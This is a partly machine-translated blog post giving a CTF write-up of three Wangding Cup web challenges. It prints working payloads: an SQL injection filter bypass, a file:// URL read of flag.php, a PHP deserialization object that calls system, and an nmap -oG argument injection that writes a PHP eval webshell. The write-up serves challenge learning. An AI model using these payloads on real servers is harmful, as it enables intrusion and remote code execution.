当前位置:网站首页>CTF-Neting Cup Past Topics
CTF-Neting Cup Past Topics
2022-08-02 04:02:00 【SevenCold】
1.[网鼎杯 2018]Fakebook
Open Connection is a forum-like oneweb应用,There are login and registration,First try at loginsql注入,失败了,Then go ahead and register,I figured it out when I registeredxss,After testing, it was found that it was not feasible.Can only obediently log in to findbug了
After logging in, I found that the username has a hyperlink,You will find it when you click inurl是这样的
自然而然又想到了sql注入,After testing it was found to be ok,Then follow the process,先用order by测试字段数,然后依次爆数据库名,表名,字段名 (During the process, it was found that the backend was filteredunion select 的组合,use after test/* */绕过)
The field names are obtained as follows
其中只有dataI don't know what the data is,I took a look and found it to be a serialized string.
I barely managed to do it myself,然后去看wp,Here you can scan it with a directory scanrobots.txt和flag.php,打开robots.txt可以发现有一个php文件的备份文件,下载后打开.
The most important of which is thisget函数了,查阅curlinformation is available,此处getThe function is mainly to open oneurl,而这个url就是我们那个blog的url,So here is the vulnerability by file inclusion,我们可以设置blog的url为file:///var/www/html/flag.php,然后就可以读取flag.php了.
There will be a paragraph in the opening pagebase64的编码,解码后即为flag.
2.[网鼎杯 2020 朱雀组]phpweb
Check the source code after getting the question,Found that the two parameters in the form arefunc和p,I suddenly realized later that it might be in the function name and parameters,然后我试了一下.
用bpCapture the packet and modify itfunc=hightlight_file和p=index.php.
说明猜测正确,在后端用call|_user_func来运行函数,But filtering a lot of functions,如exec,system等等(后面还有很多,Screenshot not taken).
我首先想到的是用include函数结合phpPseudo-protocol uploadshell,但是发现call|_user_func不能运行include函数,And then want to bypassin_array黑名单,But it doesn't seem feasible.
Then found two calls in the codecall|_user_func函数,而且TestThere is no blacklist detection for calls within the class,I'm guessing this could be a breaking point,But it didn't work out for a long time,Unfortunately, I still searchedwp.
Found that I've been fine so far,TestIt is indeed a breakthrough point,How to break through,用反序列化,就是unserialize函数,然后写了一个php脚本
class Test{
var $p = "ls";
var $func = 'system';
$n = new Test();
echo serialize($n);
Sent after getting the serialized string,Then did not find more obvious thereflag的文件,Then you can find,用find / -name flag*
然后去cat /tmp/flagoefiu4r93得到flag.
3.[网鼎杯 2020 朱雀组]Nmap
After scanning the web page with the resultnmapScan results for comparison,found to be consistent,So guess the backend of the web page is callednmap命令,Then we can use some weird commands.
-oN (标准输出)
-oX (XML输出)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep输出)
-oA (输出至所有格式)
' <?= @eval($_POST[1]);?> -oG a.phtml '
因为过滤了php,So use short tags<?= ?>代替,Then I saw the big guywp,Surround with single quotes and spacesescapeshellarg()与escapeshellcmd()函数(Pure knowledge blind spot)
Then you can connect with ant sword or kitchen knife,找到flag咯.
- The focus of the Dom implementation input triggers
- 17. JS conditional statements and loops, and data type conversion
- Turn trendsoft/capital amount of Chinese capital library
- DNS详解
- Smart Tips for Frida Scripting in Kali Environment
- PHP deserialization vulnerability
- Scrapy爬虫遇见重定向301/302问题解决方法
- hackmyvm-bunny预排
- SQL classification, DQL (Data Query Language), and corresponding SQL query statement demonstration
- hackmyvm-random walkthrough
(3) Thinkphp6 database
(7) 浅学 “爬虫” 过程 (概念+练习)
Stable and easy-to-use short connection generation platform, supporting API batch generation
GreenOptic: 1 vulnhub walkthrough
TypeScript error error TS2469, error TS2731 solution
4. The form with the input
hackmyvm-random walkthrough
(7) superficial "crawlers" process (concept + practice)
IO stream, encoding table, character stream, character buffer stream
After Alibaba Cloud sets up domain name resolution redirection, I cannot use Chrome to access it
17. JS conditional statements and loops, and data type conversion
JS objects, functions and scopes
Advanced Operations on Arrays
hackmyvm: kitty walkthrough
v-bind usage: class dynamic binding object array style style and function method
How to log in to Alibaba Cloud server using the admin account
Add a full image watermark to an image in PHP
[league/climate] A robust command-line function manipulation library
1. Beginning with PHP
Multithreading (implementing multithreading, thread synchronization, producer and consumer)
VIKINGS: 1 vulnhub walkthrough
Shuriken: 1 vulnhub walkthrough